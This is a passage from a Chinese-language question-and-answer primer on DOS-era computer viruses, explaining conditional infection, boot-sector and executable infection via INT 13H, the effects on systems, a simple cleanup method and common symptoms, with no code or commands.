从目前蔓延传播病毒来看所谓条件传染, 是指一些病毒在传染过程中, 在被传染的系统中的特定位置上打上自己特有的示志。这一病毒在再次攻击这一系统时, 发现有自己的标志则不再进行传染, 如果是一个新的系统或软件, 首先读特定位置的值, 并进行判断, 如果发现读出的值与自己标识不一致, 则对这一系统或应用程序, 或数据盘进行传染, 这是一种情况；另一种情况, 有的病毒通过对文件的类型来判断是否进行传染, 如黑色星期五病毒只感染.COM或.EXE文件等等；还有一种情况有的病毒是以计算机系统的某些设备为判断条件来决定是否感染。例如大麻病毒可以感染硬盘, 又可以感染软盘, 但对B驱动器的软盘进行读写操作时不传染。但我们也发现有的病毒对传染对象反复传染。例如黑色星期五病毒只要发现.EXE文件就进行一次传染, 再运行再进行传染反复进行下去。

可见有条件时病毒能传染, 无条件时病毒也可以进行传染。

微型计算机病毒对系统的影响表现在哪些方面?

计算机病毒对微型计算机而言它的影响表现在：

（1）破坏硬盘的分区表, 即硬盘的主引导扇区。

（2）破坏或重写软盘或硬盘DOS系统Boot区即引导区。

（3）影响系统运行速度, 使系统的运行明显变慢。

（4）破坏程序或覆盖文件。

（5）破坏数据文件。

（6）格式化或者删除所有或部分磁盘内容。

（7）直接或间接破坏文件连接。

（8）使被感染程序或覆盖文件的长度增大。

计算机病毒传染的一般过程是什么?

在系统运行时, 病毒通过病毒载体即系统的外存储器进入系统的内存储器, 常驻内存。该病毒在系统内存中监视系统的运行, 当它发现有攻击的目标存在并满足条件时, 便从内存中将自身存入被攻击的目标, 从而将病毒进行传播。而病毒利用系统INT 13H读写磁盘的中断又将其写入系统的外存储器软盘或硬盘中, 再感染其他系统。

可执行文件感染病毒后又怎样感染新的可执行文件?

可执行文件.COM或.EXE感染上了病毒, 例如黑色星期五病毒, 它驻入内存的条件是在执行被传染的文件时进入内存的。一旦进入内存, 便开始监视系统的运行。当它发现被传染的目标时, 进行如下操作：

（1）首先对运行的可执行文件特定地址的标识位信息进行判断是否已感染了病毒；

（2）当条件满足, 利用INT 13H将病毒链接到可执行文件的首部或尾部或中间, 并存大磁盘中；

（3）完成传染后, 继续监视系统的运行, 试图寻找新的攻击目标。

操作系统型病毒是怎样进行传染的?

正常的PC DOS启动过程是：

（1）加电开机后进入系统的检测程序并执行该程序对系统的基本设备进行检测；

（2）检测正常后从系统盘0面0道1扇区即逻辑0扇区读入Boot引导程序到内存的0000: 7C00处；

（3）转入Boot执行之；

（4）Boot判断是否为系统盘, 如果不是系统盘则提示；

non-system disk or disk error

Replace and strike any key when ready

否则, 读入IBM BIO.COM和IBM DOS.COM两个隐含文件；

（5）执行IBM BIO.COM和IBM DOS.COM两个隐含文件, 将COMMAND.COM装入内存；

（6）系统正常运行, DOS启动成功。

如果系统盘已感染了病毒, PC DOS的启动将是另一番景象, 其过程为：

（1）将Boot区中病毒代码首先读入内存的0000: 7C00处；

（2）病毒将自身全部代码读入内存的某一安全地区、常驻内存, 监视系统的运行；

（3）修改INT 13H中断服务处理程序的入口地址, 使之指向病毒控制模块并执行之。因为任何一种病毒要感染软盘或者硬盘, 都离不开对磁盘的读写操作, 修改INT 13H中断服务程序的入口地址是一项少不了的操作；

（4）病毒程序全部被读入内存后才读入正常的Boot内容到内存的0000: 7C00处, 进行正常的启动过程；

（5）病毒程序伺机等待随时准备感染新的系统盘或非系统盘。

如果发现有可攻击的对象, 病毒要进行下列的工作：

（1）将目标盘的引导扇区读入内存, 对该盘进行判别是否传染了病毒；

（2）当满足传染条件时, 则将病毒的全部或者一部分写入Boot区, 把正常的磁盘的引导区程序写入磁盘特写位置；

（3）返回正常的INT 13H中断服务处理程序, 完成了对目标盘的传染。

操作系统型病毒在什么情况下对软、硬盘进行感染?

操作系统型病毒只有在系统引导时进入内存。如果一个软盘染有病毒, 但并不从它上面引导系统，则病毒不会进入内存, 也就不能活动。例如圆点病毒感染软盘、硬盘的引导区, 只要用带病毒的盘启动系统后, 病毒便驻留内存, 对哪个盘进行操作, 就对哪个盘进行感染。

操作系统型病毒对非系统盘感染病毒后最简单的处理方法是什么?

因为操作系统型病毒只有在系统引导时才进入内存, 开始活动, 对非系统盘感染病毒后, 不从它上面引导系统, 则病毒不会进入内存。这时对已感染的非系统盘消毒最简单的方法是将盘上有用的文件拷贝出来, 然后将带毒盘重新格式化即可。

目前发现的计算机病毒主要症状有哪些?

从目前发现的病毒来看, 主要症状有：

（1）由于病毒程序把自己或操作系统的一部分用坏簇隐起来, 磁盘坏簇莫名其妙地增多。

（2）由于病毒程序附加在可执行程序头尾或插在中间, 使可执行程序容量增大。

（3）由于病毒程序把自己的某个特殊标志作为标签, 使接触到的磁盘出现特别标签。

（4）由于病毒本身或其复制品不断侵占系统空间, 使可用系统空间变小。

（5）由于病毒程序的异常活动, 造成异常的磁盘访问。

（6）由于病毒程序附加或占用引导部分, 使系统导引变慢。

（7）丢失数据和程序。

（8）中断向量发生变化。

（9）打印出现问题。

（10）死机现象增多。

（11）生成不可见的表格文件或特定文件。

（12）系统出现异常动作, 例如：突然死机, 又在无任何外界介入下, 自行起动。

（13）出现一些无意义的画面问候语等显示。

（14）程序运行出现异常现象或不合理的结果。

（15）磁盘的卷标名发生变化。

（16）系统不认识磁盘或硬盘不能引导系统等。

（17）在系统内装有汉字库且汉字库正常的情况下不能调用汉字库或不能打印汉字。

（18）在使用写保护的软盘时屏幕上出现软盘写保护的提示。

（19）异常要求用户输入口令